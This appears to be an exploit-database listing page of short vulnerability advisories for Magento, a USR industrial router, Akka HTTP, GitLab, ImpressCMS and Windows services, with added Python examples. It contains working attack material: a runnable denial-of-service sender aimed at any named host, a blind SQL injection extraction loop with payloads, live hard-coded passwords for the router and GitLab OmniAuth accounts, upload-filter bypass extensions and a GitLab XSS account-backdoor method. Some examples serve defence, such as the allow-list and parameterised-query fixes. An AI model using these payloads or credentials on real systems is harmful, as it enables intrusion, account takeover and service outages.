Explore Vulnerabilities

Explore all Exploits:

Magento eCommerce CE v2.3.5-p2 – Blind SQLi

Magento eCommerce CE v2.3.5-p2 is vulnerable to Blind SQL Injection. An attacker can inject malicious SQL queries via the quote_id parameter in the POST /cargo/index/validateqty request and the PUT /rest/default/V1/carts/mine/coupons/aydin request. This can allow an attacker to extract data from the database, modify data, execute administration operations, and potentially compromise the system.

USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 – Remote Root Backdoor

USR-G806 is an industrial 4G LTE wireless router that lets users connect their own devices to a 4G network over a WiFi or Ethernet interface. It uses a high-performance embedded CPU running at 580 MHz and is deployed for high-speed data transmission in smart grid, smart home, public bus and vending machine environments. USR-G806 ships with hard-coded credentials inside its Linux distribution image. These credentials are never exposed to the end user and cannot be changed through any normal operation of the device. The 'usr' account with password 'www.usr.cn' has the highest privileges on the device; the same password is also the default WLAN password.
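The practical check for this class of finding is to pull /etc/passwd and /etc/shadow out of the extracted firmware root and list every account that carries a usable password hash, paying particular attention to UID 0. The following is an added example, not code from the advisory or from USR IOT; the passwd and shadow contents are constructed (the hash string is a placeholder, not the device's real hash, and giving 'usr' UID 0 is an assumption made so the example has a privileged account to flag):

```python
from dataclasses import dataclass

# Constructed sample files standing in for the extracted firmware rootfs.
# The 'usr' account is given uid 0 as an assumption; the hashes are placeholders.
PASSWD = """\
root:x:0:0:root:/root:/bin/ash
usr:x:0:0:usr:/home/usr:/bin/ash
nobody:x:65534:65534:nobody:/var:/bin/false
daemon:x:1:1:daemon:/var:/bin/false
"""
SHADOW = """\
root:!:0:0:99999:7:::
usr:$1$abcdefgh$0123456789abcdefghijkl:0:0:99999:7:::
nobody:*:0:0:99999:7:::
daemon:$6$saltsalt$placeholderhash:0:0:99999:7:::
"""

# Field values that mean "no usable password" in either file.
LOCKED_MARKERS = ("", "!", "*", "!!", "x")


@dataclass
class Account:
    name: str
    uid: int
    shell: str
    hash: str

    @property
    def password_usable(self) -> bool:
        """True when the hash field holds a real hash rather than a lock marker."""
        return self.hash not in LOCKED_MARKERS and not self.hash.startswith("!")


def parse_passwd(text):
    """Map user -> (uid, shell, passwd-file hash field)."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) < 7:
            continue  # malformed line; skip rather than guess
        entries[f[0]] = (int(f[2]), f[6], f[1])
    return entries


def parse_shadow(text):
    """Map user -> shadow hash field."""
    hashes = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) >= 2 and f[0]:
            hashes[f[0]] = f[1]
    return hashes


def find_password_accounts(passwd_text, shadow_text):
    """Return accounts that can authenticate with a baked-in password, lowest uid first.

    The shadow hash wins when present; otherwise the passwd hash field is used,
    which covers images that never split the hash out into /etc/shadow.
    """
    users = parse_passwd(passwd_text)
    hashes = parse_shadow(shadow_text)
    found = []
    for name, (uid, shell, pw_hash) in users.items():
        acct = Account(name, uid, shell, hashes.get(name, pw_hash))
        if acct.password_usable:
            found.append(acct)
    return sorted(found, key=lambda a: (a.uid, a.name))


if __name__ == "__main__":
    for a in find_password_accounts(PASSWD, SHADOW):
        flag = "PRIVILEGED" if a.uid == 0 else "unprivileged"
        print(f"{a.name:10} uid={a.uid:<6} shell={a.shell:12} {flag}")
```

Any UID 0 account in the output with an interactive shell is a root backdoor unless the hash is regenerated per device; accounts such as 'daemon' with a hash but a /bin/false shell still deserve a look, because other services may authenticate against the same hash.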

Akka HTTP Denial of Service via Nested Header Comments

This exploit is related to CVE-2021-42697, a denial of service vulnerability in Akka HTTP 10.1.x before 10.1.15 and 10.2.x before 10.2.7. It is triggered by sending a request whose User-Agent header carries a nested comment payload. The payload is 8191 characters long, which is sufficient to trigger a stack overflow in the header parser. If the server is successfully DoSed, an exception is returned instead of a normal response.
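HTTP header comments are parenthesised, and each '(' opens another nesting level that the vulnerable parser descends into recursively, so the payload is simply a very deep run of opening parentheses. The following is an added example, not code from the advisory or from the Akka project: it builds the raw request, optionally sends it, and classifies the response. It assumes that unclosed opening parentheses alone drive the recursion (the page does not say whether the payload is balanced) and uses the page's 8191-character figure, which also keeps the value one byte under a common 8 KiB header-value limit.

```python
import socket


def nested_comment_payload(length=8191):
    """User-Agent value made of `length` nested comment openers.

    Assumption: the recursion happens on each '(' as it is parsed, so no
    closing parentheses are needed. 8191 is the figure given on the page.
    """
    return "(" * length


def build_request(host, path="/", ua_length=8191):
    """Raw HTTP/1.1 request bytes carrying the payload in User-Agent."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        f"User-Agent: {nested_comment_payload(ua_length)}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def looks_like_failure(response):
    """Heuristic verdict: empty response (connection dropped) or a 5xx status
    indicates the handler died while parsing the header."""
    if not response:
        return True
    status_line = response.split(b"\r\n", 1)[0]
    parts = status_line.split(b" ")
    return len(parts) >= 2 and parts[1].startswith(b"5")


def send_request(host, port, timeout=5.0):
    """Send the request over a plain TCP socket and return the raw response.
    Not exercised by the tests; only runs against a host you name explicitly."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(host))
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


if __name__ == "__main__":
    import sys
    target_host, target_port = sys.argv[1], int(sys.argv[2])
    resp = send_request(target_host, target_port)
    print("server failed" if looks_like_failure(resp) else "server answered normally")
    print(resp[:200])
```

A fixed server should answer with a normal status (typically 400 for the malformed header, or 200 if it ignores User-Agent); the vulnerable one either closes the connection or returns a 500, which is what `looks_like_failure` keys on.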

Microfinance Management System 1.0 – ‘customer_number’ SQLi

Microfinance Management System allows SQL Injection via parameter 'customer_number' in /mims/updatecustomer.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
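Both the Magento entry above (blind injection through quote_id) and this customer_number injection come down to user input concatenated into a query. As an added example, not code from either advisory or either product, here is a lookup written the vulnerable way beside the parameterised fix, plus the boolean-blind extraction loop an attacker runs against the vulnerable version: it never sees the secret directly, only whether the query returned rows. The schema, rows and table names are constructed for the example.

```python
import sqlite3
import string

# Constructed schema and data; nothing here comes from Magento or MIMS.
SCHEMA = """
CREATE TABLE customers (customer_number TEXT PRIMARY KEY, name TEXT NOT NULL);
CREATE TABLE admin_users (username TEXT PRIMARY KEY, api_token TEXT NOT NULL);
INSERT INTO customers VALUES ('C-1001', 'Alice'), ('C-1002', 'Bob'), ('C-1003', 'Carol');
INSERT INTO admin_users VALUES ('admin', 'tok3n');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def find_customer_vulnerable(conn, customer_number):
    """The bug: the parameter is pasted into the SQL text, so quotes in it
    terminate the literal and the rest is executed as SQL."""
    sql = "SELECT name FROM customers WHERE customer_number = '" + customer_number + "'"
    return [row[0] for row in conn.execute(sql)]


def find_customer_safe(conn, customer_number):
    """The fix: a bound parameter is always treated as data, never as SQL."""
    sql = "SELECT name FROM customers WHERE customer_number = ?"
    return [row[0] for row in conn.execute(sql, (customer_number,))]


def blind_extract_token(conn, lookup=find_customer_vulnerable, max_len=32):
    """Boolean-blind extraction through the vulnerable lookup.

    Each probe asks "is character `pos` of the admin token equal to `ch`?";
    a non-empty result set means yes. The trailing comment swallows the
    closing quote the application appends.
    """
    alphabet = string.ascii_letters + string.digits
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (
                "x' OR EXISTS(SELECT 1 FROM admin_users WHERE username='admin' "
                f"AND substr(api_token,{pos},1)='{ch}') --"
            )
            if lookup(conn, payload):
                recovered += ch
                break
        else:
            break  # no character matched: end of the token (or alphabet too small)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_customer_vulnerable(db, "x' OR '1'='1"))
    print("safe:      ", find_customer_safe(db, "x' OR '1'='1"))
    print("extracted: ", blind_extract_token(db))
```

The extraction loop is what "blind" means in the Magento entry: the response body never contains the token, yet one byte per position leaks through the true/false difference in the result set. Running `blind_extract_token(db, lookup=find_customer_safe)` returns an empty string, because the probes are just unmatched customer numbers once the query is parameterised.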

ImpressCMS v1.4.4 – Unrestricted File Upload

Between lines 152 and 162 the function 'extensionsToBeSanitized' implements a blacklist of forbidden upload extensions. Because a blacklist can only ever enumerate what its author thought of, files with the following extensions are still accepted: .php2, .php6, .php7, .phps, .pht, .pgif, .shtml, .htaccess, .phar, .inc
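The fix is to invert the logic: accept only a short list of known-safe extensions, require every suffix of a multi-dotted name to be on it, and reject dotfiles outright. The following is an added example and is not ImpressCMS's code; the deny-list it starts from is a constructed stand-in for the real 'extensionsToBeSanitized' list (which is not reproduced on the page), chosen so that each extension named above slips through it.

```python
import os
import posixpath

# Constructed stand-in for a typical weak deny-list; not ImpressCMS's actual list.
BLACKLIST = {".php", ".php3", ".php4", ".php5", ".phtml"}

# What an upload handler for images/documents should accept, and nothing else.
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}

# The extensions the page reports as still uploadable.
BYPASS_EXTENSIONS = [".php2", ".php6", ".php7", ".phps", ".pht",
                     ".pgif", ".shtml", ".htaccess", ".phar", ".inc"]


def blacklist_allows(filename):
    """The weak check: only the final extension is compared against the deny-list.
    '.htaccess' has no extension at all according to splitext, so it passes too."""
    _, ext = os.path.splitext(filename.lower())
    return ext not in BLACKLIST


def allowlist_allows(filename):
    """The hardened check.

    - strips any directory component the client sent
    - rejects dotfiles (empty stem) such as .htaccess
    - requires at least one suffix
    - requires *every* suffix to be on the allow-list, so 'shell.php.png'
      is rejected (web servers with multi-extension handling may otherwise
      treat it as PHP)
    """
    base = posixpath.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    return all("." + p in ALLOWLIST for p in parts[1:])


def compare_filters(extensions=BYPASS_EXTENSIONS):
    """For each reported bypass extension: (blacklist verdict, allowlist verdict)."""
    names = [e if e == ".htaccess" else "payload" + e for e in extensions]
    return {n: (blacklist_allows(n), allowlist_allows(n)) for n in names}


if __name__ == "__main__":
    for name, (weak, strong) in compare_filters().items():
        print(f"{name:18} blacklist={'ALLOW' if weak else 'deny':5} allowlist={'ALLOW' if strong else 'deny'}")
```

Even with the allow-list in place, store uploads under a server-generated name outside the web root, and serve them with a fixed Content-Type; the extension check is the first layer, not the only one.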

Gitlab Stored XSS

Any user can create a project and place a stored XSS payload in one of its issues. XSS on GitLab is especially dangerous because the script can create personal access tokens for users who visit the affected page, silently backdooring their accounts. One way to abuse it is to change the document base URL of the project page to the attacker's site, so that the page's scripts are sourced from there; the attacker then hosts scripts whose names match the ones the page requests (this can break parts of the page). A standard script include also works, depending on the site's CSP policy, and is stealthier.

Gitlab 14.9 – Authentication Bypass

A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2, allowing attackers to potentially take over those accounts. Any such account created while the instance was running an affected version (from the first affected release up to the patched one) can be logged into with the following password: 123qweQWE!@#000000000

EaseUS Data Recovery – ‘ensserver.exe’ Unquoted Service Path

EaseUS Data Recovery contains a vulnerability in the 'ensserver.exe' service, which is installed with the EaseUS UPDATE SERVICE. The service is configured to start automatically, but the path to its executable is not quoted, which could allow a local attacker to gain elevated privileges.

PTPublisher v2.3.4 – Unquoted Service Path

The vulnerability exists due to an unquoted service path in the PTProtect service. Because the path contains spaces and is not quoted, Windows tries each space-delimited prefix of it as an executable name before reaching the intended binary. An attacker who can write to one of the directories along that path can plant an executable named after the prefix (for example a file named after the first word of the path, with a .exe suffix, in the parent directory), and it will be executed with SYSTEM privileges when the service starts.
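The same enumeration applies to both unquoted service path entries above. As an added example, not code from either advisory or vendor, the function below takes a service's ImagePath and lists the hijack candidates Windows would try before the real executable; a second helper filters them to the ones whose parent directory the current user can write, which is the actual privilege-escalation condition. The EaseUS path used in the test is constructed for illustration; the page does not give the real install directory.

```python
import os


def hijack_candidates(image_path):
    """Paths the Service Control Manager may try before the intended binary.

    An unquoted path is split at spaces; for each prefix up to (but not
    including) the real executable, the candidate is that prefix plus ".exe".
    A properly quoted path, or one without spaces, yields no candidates.
    """
    path = image_path.strip()
    if not path or path.startswith('"'):
        return []
    parts = path.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            break  # the real executable has been reached; what follows are arguments
        candidates.append(prefix + ".exe")
    return candidates


def writable_candidates(image_path):
    """On a live Windows host: the candidates the current user could actually plant.
    Only meaningful when run on the target; the tests do not call it."""
    out = []
    for cand in hijack_candidates(image_path):
        parent = os.path.dirname(cand) or "."
        if os.path.isdir(parent) and os.access(parent, os.W_OK):
            out.append(cand)
    return out


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p)
        for c in hijack_candidates(p):
            print("   candidate:", c)
        print("   writable now:", writable_candidates(p))
```

On a Windows host, feed it the PathName column from `wmic service get name,pathname,startmode` or from `Get-CimInstance Win32_Service` in PowerShell; any service whose path has a writable candidate and runs as LocalSystem is exploitable exactly as the two entries describe. Note that `C:\Program.exe` is a candidate for almost every unquoted path under `C:\Program Files`, but the root of the system drive is not writable by standard users on a default install, so the deeper candidates are usually the interesting ones.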